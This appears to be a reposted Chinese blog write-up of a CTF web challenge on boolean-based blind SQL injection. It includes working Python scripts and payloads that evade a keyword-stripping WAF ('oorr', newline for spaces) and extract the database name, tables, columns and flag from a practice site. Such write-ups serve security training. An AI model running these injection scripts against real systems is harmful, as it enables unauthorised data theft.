CTF-Web16(涉及布尔盲注脚本以及waf过滤等,难度较大)

最新推荐文章于 2024-01-05 15:33:49 发布
最新推荐文章于 2024-01-05 15:33:49 发布
阅读量669 收藏 1
点赞数
分类专栏: CTF-Web
原文链接:https://blog.csdn.net/xingyyn78/article/details/79747404
版权

16.认真一点

分析:

POST提交
id=1
显示Youarein................
id=0
显示Youarenotin...............
有区别就好做了,随便输入id=1pcatissocoooooooooool还是回显Youarein
说明这是字符型注入,1开头的字符串被弱类型等于1,输入id=1'显示Youarenotin,就庆幸了,因为说明单引号没被转义(若是转义了,就应该显示Youarein)。这里作为一名ctfer,有
种直觉就是会有waf,于是POST提交id=1§1§使用burpuite的Intruder功能,使用单字符的字典(自己准备啊),测试下waf有哪些(这其实就是一种模糊测试)。

使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。

  但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该是后台删去了or关键字。使用oorr进行替换,当后台删去or时,or左边的o与右边的r新形成一个or关键字。

 因此可以通过判断形成的SQL语句结果结果是否为1确定查询内容的正确性,首先确定数据库名长度。构造id=0'oorr(length(database())=len)oorr'0判断数据库名长度。len是要确定的长度。使用burp suite进行破解,发现len=18。

然后对数据库名爆破,针对每一位数据库的字母进行爆破。以第一位为例,可以看出爆破结果为c或C。整个数据库名可以全部爆破出来。数据库名为ctf_sql_bool_blind。其中id=0'oorr((mid((user())from(y)foorr(x)))='%s')oorr'0中的foorr是为了避免删除or,在删除or后形成for。

    可以通过构建相应语句爆破库中表名及列名及列中元素值。本打算先爆破数据库中表的长度,但是测试到30多位依然不通过,直接爆破表名,表应该有两个,一个为fiag,另一个为users。不知道为什么后面会有一堆-------,在本地数据库测试时只有表名。使用爆破语句,id=0'oorr((select(mid(group_concat(table_name separatoorr '@')from(x)foorr(1)))from

(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='y')oorr'0;x为位数,y为字符。

        为了方便也可以写脚本。从表名上看flag应该在表flag中。

布尔盲注脚本:

import requests
print("start")
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php "
for i in range(1,30):
    key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    res = requests.post(url,data=key).text
    print(i)
    if str in res:
        print('database length: %s'%i)
        break
print("end!")

18个,然后就是爆数据库名

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1,19):
    for j in guess:
        key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        res = requests.post(url,data=key).text
        print('............%s......%s.......'%(i,j))
        if str in res:
            database += j
            break
print(database)
print("end!")

表长度


import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
    res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
    res = res.replace(' ',chr(0x0a))
    key = {'id':res}
    r = requests.post(url,data=key).text
    print(i)
    if str in r:
        print("length: %s"%i)
        break
    i+=1
print("end!")

表名(这里是用@分隔开了表名,有两张表)

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1,12):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        res = res.replace(' ', chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        print(i)
        if str in r:
            table += j
            break
print(table)
print("end!")

列宽

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
    res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
    res = res.replace(' ',chr(0x0a))
    key = {'id':res}
    r = requests.post(url,data=key).text
    print(i)
    if str in r:
        print("length: %s"%i)
        break
    i += 1
print("end!")

列名

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1,6):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
        res = res.replace(' ',chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        print("......%s.........%s........."%(i,j))
        if str in r:
            column+=j
            break
print(column)
print("end!")

很明显,flag表flag列,dump一下就行了

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1,20):
    for j in guess:
        res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
        res = res.replace(' ',chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        'print("........%s..........%s........"%(i,j))'
        if str in r:
            flag+=j
            print(flag)
            break
print(flag)
print("end!")

注意这里的 减号 其实是空格,因为这一道题空格被过滤了,所以脚本中也没考虑空格。

内容来源:

https://blog.csdn.net/xiaorouji/article/details/80574986

https://blog.csdn.net/xingyyn78/article/details/79747404

红烧兔纸
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助 描述 一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。 用法 usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies COOKIES] [--flags FLAGS] [-f] url positional arguments: url URL of the target website optional arguments: -h, --help show this help message and exit -v, --version show program ' s version number and exit --comments
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web进行CTF挑战
03-25
CTF-网络挑战 使用PHP在Web进行CTF挑战 链接: :
CTF-WEB做题解析
qq_63676207的博客
02-09 1103
1 view_source 这个首先下载环境打开后是这个页面 ctrl+f查看源代码发现flag cyberpeace{f6ae307bc76ed9d260c19e9936765c00 2 robots 这个下好环境后点进去显示啥都没有 看看题目是robots想到是Robots协议(也称为爬虫协议、机器人协议等)的全称是“网络爬虫排除标准”(Robots Exclusion Protocol),网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 Robots协议也..
ctf web方向与php学习记录31之waf初见(1)
这周末在做梦的博客
01-18 732
这里写目录标题一,概述二,例题 一,概述 Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 二,例题 [BUUCTF easy_calc] ...
CTFWeb题目的各种基础的思路-----入门篇十分的详细
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
ctf各种sql盲注脚本
qq_51862722的博客
08-17 2648
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间盲注(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极客大挑战finilysql(buuctf) 1.通过post传参的脚本 用的时候修改post参数和个数 1.1 基于异或盲注布尔盲注等: import requests url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:
两种CTF特殊盲注的总结
合天网安学院
02-04 918
知识点实操概要MySQL注入,3种盲注方式:基于布尔盲注、基于时间的盲注、基于报错的盲注。以此掌握盲注原理!链接指路:https://www.hetianlab.com/expc.do...
CTF-一道盲注和显注结合的SQL注入题
魔域的墨鱼
01-30 1230
一、BASIC 1、babyBASE64 题目给出了一串编码,加上题目提示,明显看出是base64加密过的,找个base64的网站解码即可得到flag 二、WEB 1、你能跨过去吗? 网址:http://120.79.220.111:7001/SW01/a.php 题目提示key是XSS,并且给出了一个神秘的网址…观察发现,在两个%2b之间疑似是base64编码,尝试一下解码。发现以下现象 ...
CTF-Web小白入门篇超详细——了解CTF-Web基本题型及其解题方法 总结——包含例题的详细题解
热门推荐
日熙的博客
09-29 14万+
上次经过一次比赛的打击,决定不能只是一直盲目的刷基础题,应该加快进度,从各种基本题型开始下手,每种题型都应该去找题目刷一刷,并做好总结,于是乎决定写下这篇文章。之后会边做题边更新,欢迎各位大佬指教。 本文目录基础知识类题目总结:具体题型包括:HTTP头相关的题目Git源码泄露Python爬虫信息处理PHP代码审计(重要!!!)XSS题目绕过wafSQL注入 基础知识类题目 总结: 1.是最基本...
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1858
sql布尔盲注
[ctfshow 2023元旦水友赛]web题解
最新发布
rev1ve的博客
01-05 2389
按照waf_in_waf_php对name的值进行waf以及waf_in_waf_php的hint是base64,并且结合。简单点讲,就是我们先对我们的chu0的值进行加密也就是标记,然后拼接在一起后进行过滤器解析,利用最后的base64-decode无法解析前面ctfshowshowshowwww的垃圾字符被去除掉,而我们的chu0的值则会被正确解析并保留。有一个特性,当GET和POST有相同的变量时,匹配POST的变量,那么就可以同时传参GET和POST即可绕过,也就是POST传参数字。
2021-8-10ctf的Hack World 1(sql异或布尔盲注入,fuzz测试waf词语方法,通常做ctfsql题目的思路)
qq_45290991的博客
08-10 634
今天这道题算是一个总结吧,其实不难,就是很多细节没有办法想到所以导致出了很多问题。最近也一些关于ctf的sql注入的简单题目,我总结了一下经验,主要从审题、确定注入类型(难点),构造绕过waf的payload几个方面进行讲解。 一、审题 这道题我审题就没做好,为何这么说呢? 首先,题目的意思是在flag表查询flag列即可: 但是用脚指头想都知道不可能这么简单呀!这是一个post数据的网页,然后就按照常规思路来吧: 我输入1,2,返回了正常的问候“找女友屌丝系列”: 接着我就用了常
西普学院CTF习题解析——WEB(已完成16/16)
乐枕的家
09-15 2万+
源西普学院实验吧 预备知识点 页面调试 审查元素 html js php asp sql 等语法基础 请求头 响应头 伪造IP SQL注入基础 XSS基础 Web常用编码 “网站后台”概念及猜解、扫描技术 脑洞 工具参考 BurpSuite Firefox_firebug Firefox_tamperdata Firefox_modifyheader 御剑 XSSEE(编码解码器) sqlma
2020年春秋杯新春战“疫”网络安全公益赛——盲注
qq_34106499的博客
03-04 705
准备总结一下常见的sql注入及过滤,拿出这道题来回顾一下
Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注
weixin_30593443的博客
07-12 405
Day41 login3(SKCTF) http://123.206.31.85:49167/ flag格式:SKCTF{xxxxxxxxxxxxx} hint:基于布尔的SQL盲注 本题要点:异或运算、布尔盲注过滤 打开是一个登录窗口 用bp抓一下包 发送至repeater 没什么新发现........ 随便试试其他用户名,...
[WUSTCTF2020]颜值成绩查询
CyhDl666的博客
04-13 192
sql注入的布尔盲注 过滤了空格 直接交exp import requests url = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/" payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&()," flag = "" def colounm(): for i in range(1,50): for j in payload: .
ctfhub布尔盲注
08-31
布尔盲注是一种常用于渗透测试的技术,用于检测和利用应用程序的漏洞。在CTF比赛,也经常会涉及布尔盲注题目布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入的处理方式,通过观察应用程序在不同输入情况下的响应,来推断出隐藏在后台数据库的信息。 在CTFhub,进行布尔盲注可以通过构造不同的查询语句来判断条件是否成立。以下是一个示例: 假设存在一个登录页面,我们需要猜测正确的用户名和密码。我们可以通过发送恶意输入来检测用户名是否正确。例如,我们可以构造如下的查询语句: `SELECT * FROM users WHERE username = 'admin' AND password LIKE 'a%'` 如果应用程序返回了正常的结果(例如登录成功),那么说明用户名是正确的。否则,我们可以根据返回结果判断用户名是否错误。 通过不断尝试不同的查询语句,我们可以逐步猜测出正确的用户名和密码,从而实现布尔盲注攻击。 需要注意的是,在进行布尔盲注时,需要谨慎处理恶意输入,避免对应用程序造成不必要的风险。同时,合法授权下进行渗透测试是合法的,未经授权的渗透测试则是违法行为。在进行CTF比赛或渗透测试时,请遵守相关法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值